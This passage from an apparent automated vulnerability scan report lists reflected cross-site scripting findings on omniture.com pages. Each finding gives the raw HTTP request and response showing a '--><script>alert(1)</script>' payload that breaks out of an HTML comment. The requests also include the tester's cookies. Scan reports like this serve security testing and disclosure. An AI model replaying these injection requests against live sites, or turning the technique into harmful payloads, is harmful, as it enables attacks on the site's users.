Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/privacy/visualsciences/policybdb9d--><script>alert(1)</script>36b580adb33 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:01:56 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:01:56 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:01:57 GMT
Content-Length: 23238
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:01:56 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Privacy Center | Online Busines
...[SNIP]...
<script>alert(1)</script>36b580adb33 cached on 2 February 2011 at 11:01:56 PST (7bde4504b3aa757e7f011096cce42bb7) -->
...[SNIP]...

4.505. http://www.omniture.com/en/privacy/visualsciences/resources [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/privacy/visualsciences/resources

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload c8c79--><script>alert(1)</script>01d195fe8dc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/privacy/visualsciencesc8c79--><script>alert(1)</script>01d195fe8dc/resources HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:00:40 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:00:40 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:00:40 GMT
Content-Length: 23244
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:00:40 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Privacy Center | Online Busines
...[SNIP]...
<script>alert(1)</script>01d195fe8dc/resources cached on 2 February 2011 at 11:00:39 PST (00b5bc17102e43b1d1f58e8f8bf92fdd) -->
...[SNIP]...

4.506. http://www.omniture.com/en/privacy/visualsciences/resources [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/privacy/visualsciences/resources

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload 919a4--><script>alert(1)</script>3f40b745459 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/privacy/visualsciences/resources919a4--><script>alert(1)</script>3f40b745459 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:01:33 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:01:33 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:01:33 GMT
Content-Length: 23244
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:01:33 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Privacy Center | Online Busines
...[SNIP]...
<script>alert(1)</script>3f40b745459 cached on 2 February 2011 at 11:01:33 PST (bf418617b66ab8c4144f2983e138bb27) -->
...[SNIP]...

4.507. http://www.omniture.com/en/privacy/visualsciences/terms [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/privacy/visualsciences/terms

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload f8467--><script>alert(1)</script>5a44369eb01 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/privacy/visualsciencesf8467--><script>alert(1)</script>5a44369eb01/terms HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:01:30 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:01:30 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:01:31 GMT
Content-Length: 23236
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:01:30 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Privacy Center | Online Busines
...[SNIP]...
<script>alert(1)</script>5a44369eb01/terms cached on 2 February 2011 at 11:01:30 PST (d132d9b288e2cde58e7f6810cb27ecfc) -->
...[SNIP]...

4.508. http://www.omniture.com/en/privacy/visualsciences/terms [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/privacy/visualsciences/terms

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload 82669--><script>alert(1)</script>c2c4ac2ae1c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/privacy/visualsciences/terms82669--><script>alert(1)</script>c2c4ac2ae1c HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:02:29 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:02:29 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:02:29 GMT
Content-Length: 23236
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:02:29 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Privacy Center | Online Busines
...[SNIP]...
<script>alert(1)</script>c2c4ac2ae1c cached on 2 February 2011 at 11:02:28 PST (c2252231fbeb5c1d9cb83ebff264656f) -->
...[SNIP]...

4.509. http://www.omniture.com/en/resources/articles [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/resources/articles

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 3d10f--><script>alert(1)</script>142687c8714 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/resources/articles3d10f--><script>alert(1)</script>142687c8714 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:17:29 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:17:29 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:17:29 GMT
Content-Length: 31858
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:17:29 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Online Business Optimization Re
...[SNIP]...
<script>alert(1)</script>142687c8714 cached on 2 February 2011 at 11:17:29 PST (29342e77a0362bb5b40eaa3bec5f05d2) -->
...[SNIP]...

4.510. http://www.omniture.com/en/resources/case_studies [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/resources/case_studies

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 98f60--><script>alert(1)</script>69e83a7499 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/resources/case_studies98f60--><script>alert(1)</script>69e83a7499 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:17:16 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:17:16 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:17:16 GMT
Content-Length: 31864
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:17:16 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Online Business Optimization Re
...[SNIP]...
<script>alert(1)</script>69e83a7499 cached on 2 February 2011 at 11:17:16 PST (f073557411b589107d200feaa3d550f6) -->
...[SNIP]...

4.511. http://www.omniture.com/en/resources/cmo.com [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/resources/cmo.com

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 5d3c6--><script>alert(1)</script>d1f6d8d3f32 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/resources/cmo.com5d3c6--><script>alert(1)</script>d1f6d8d3f32 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 05:43:13 GMT
Cache-Control: public, max-age=14400
Last-Modified: Thu, 03 Feb 2011 05:43:13 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 05:43:13 GMT
Content-Length: 31855
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:43:13 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Online Business Optimization Re
...[SNIP]...
<script>alert(1)</script>d1f6d8d3f32 cached on 2 February 2011 at 21:43:13 PST (a17dd46e5961da0afa6606f67734ea4a) -->
...[SNIP]...

4.512. http://www.omniture.com/en/resources/guides [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/resources/guides

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload ceda8--><script>alert(1)</script>77d511f2a20 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/resources/guidesceda8--><script>alert(1)</script>77d511f2a20 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:17:00 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:17:00 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:17:00 GMT
Content-Length: 31854
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:17:00 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Online Business Optimization Re
...[SNIP]...
<script>alert(1)</script>77d511f2a20 cached on 2 February 2011 at 11:17:00 PST (34f6eab2241a2899356951a02eb517c0) -->
...[SNIP]...

4.513. http://www.omniture.com/en/resources/testimonials [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/resources/testimonials

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 281bb--><script>alert(1)</script>0ee194500b6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/resources/testimonials281bb--><script>alert(1)</script>0ee194500b6 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:17:33 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:17:33 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:17:33 GMT
Content-Length: 31866
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:17:33 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Online Business Optimization Re
...[SNIP]...
<script>alert(1)</script>0ee194500b6 cached on 2 February 2011 at 11:17:33 PST (5ca9f9a071d44bf7365716719673262b) -->
...[SNIP]...

4.514. http://www.omniture.com/en/resources/webinars [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/resources/webinars

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 6ad4f--><script>alert(1)</script>bc2fde1d0b7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/resources/webinars6ad4f--><script>alert(1)</script>bc2fde1d0b7 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:17:20 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:17:20 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:17:20 GMT
Content-Length: 31858
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:17:20 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Online Business Optimization Re
...[SNIP]...
<script>alert(1)</script>bc2fde1d0b7 cached on 2 February 2011 at 11:17:20 PST (24bc74d0346debf7d72190ab850e31bd) -->
...[SNIP]...

4.515. http://www.omniture.com/en/services/consulting [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/services/consulting

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload e5e1e--><script>alert(1)</script>e164a61e40f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/services/consultinge5e1e--><script>alert(1)</script>e164a61e40f HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:07:51 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:07:51 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:07:51 GMT
Content-Length: 24408
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:07:51 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Online Business Optimization Pl
...[SNIP]...
<script>alert(1)</script>e164a61e40f cached on 2 February 2011 at 11:07:51 PST (02f78ce643b0a3ce8449c1fec5a9ea2b) -->
...[SNIP]...

4.516. http://www.omniture.com/en/services/es [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/services/es

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload ba886--><script>alert(1)</script>0a2fdf8ad23 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

